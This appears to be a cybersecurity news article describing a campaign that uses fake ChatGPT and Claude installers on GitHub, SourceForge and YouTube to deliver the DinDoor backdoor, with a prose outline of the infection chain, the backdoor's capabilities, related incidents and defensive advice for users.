Cybercriminals Exploit Fake ChatGPT and Claude Installers to Deploy DinDoor Backdoor
In a sophisticated cyberattack campaign, threat actors are distributing a malicious backdoor known as DinDoor by masquerading as legitimate installers for popular AI tools like ChatGPT and Claude. This deceptive strategy targets content creators, gamers, and AI enthusiasts, leveraging the trust associated with these widely-used applications.
Distribution Channels and Tactics
The attackers have infiltrated reputable platforms such as GitHub and SourceForge to host their malicious files. By creating repositories that appear to offer genuine software, they exploit the credibility of these platforms to deceive users into downloading and executing harmful code. Additionally, compromised YouTube channels are being utilized to direct traffic toward these repositories. Videos on these channels, some amassing over 50,000 views, provide links to the fake installers, significantly expanding the reach of the campaign.
Technical Breakdown of the Attack
The infection process begins when a user visits a malicious repository and executes a command in their terminal, believing they are installing legitimate software. This command downloads an MSI installer file, which, when executed, initiates a sequence of events leading to the deployment of the DinDoor backdoor.
The MSI file drops a CMD file and a PowerShell script onto the victim’s machine. The PowerShell script installs the Deno JavaScript runtime using Windows package managers like Scoop and WinGet, making the activity appear routine and less likely to trigger security alerts. Once Deno is installed, it fetches and runs the DinDoor backdoor directly from the attacker’s server.
DinDoor establishes persistence by creating a Windows registry run key, ensuring it executes upon each system startup. It then communicates with a command-and-control (C2) server, allowing the attacker to deploy additional payloads and exfiltrate sensitive information from the compromised system.
Capabilities of DinDoor Backdoor
Once active, DinDoor provides the attacker with extensive control over the infected system. Its capabilities include:
– Data Theft: Extracting information from web browsers and cryptocurrency wallets.
– Surveillance: Capturing screenshots and recording clipboard activity.
– Espionage: Utilizing the Microsoft Edge browser to initiate a hidden video stream, effectively spying on the victim’s activities.
Broader Implications and Related Threats
This campaign is part of a larger trend where cybercriminals exploit the popularity of AI tools to distribute malware. Similar tactics have been observed in previous incidents:
– Malicious Chrome AI Extensions: Over 260,000 users were affected by fake AI extensions that injected remote-controlled iframes, turning browser add-ons into surveillance tools. ([cybersecuritynews.com](https://cybersecuritynews.com/chrome-ai-extensions-attacking-users/?utm_source=openai))
– Fake AI Tool Impersonation: Hackers created counterfeit versions of AI platforms like Kling AI to deliver malware, targeting millions of users. ([cybersecuritynews.com](https://cybersecuritynews.com/hackers-created-fake-version-of-ai-tool/?utm_source=openai))
– Malicious PyPi Packages: Developers were targeted with packages mimicking ChatGPT and Claude, which distributed modified versions of malware. ([cybersecuritynews.com](https://cybersecuritynews.com/malicious-pypi-package-mimic-chatgpt-claude/?utm_source=openai))
Recommendations for Users
To mitigate the risk of such attacks, users are advised to:
1. Download Software from Official Sources: Always obtain software directly from the official websites or trusted app stores.
2. Verify Authenticity: Be cautious of software promoted through unofficial channels or unfamiliar platforms.
3. Exercise Caution with Commands: Avoid executing commands from unverified sources in your terminal or command prompt.
4. Maintain Updated Security Software: Ensure that your antivirus and anti-malware programs are up to date to detect and prevent such threats.
5. Stay Informed: Keep abreast of the latest cybersecurity threats and tactics employed by attackers to recognize and avoid potential risks.
By adhering to these practices, users can significantly reduce their vulnerability to malware campaigns that exploit the trust associated with popular AI tools.
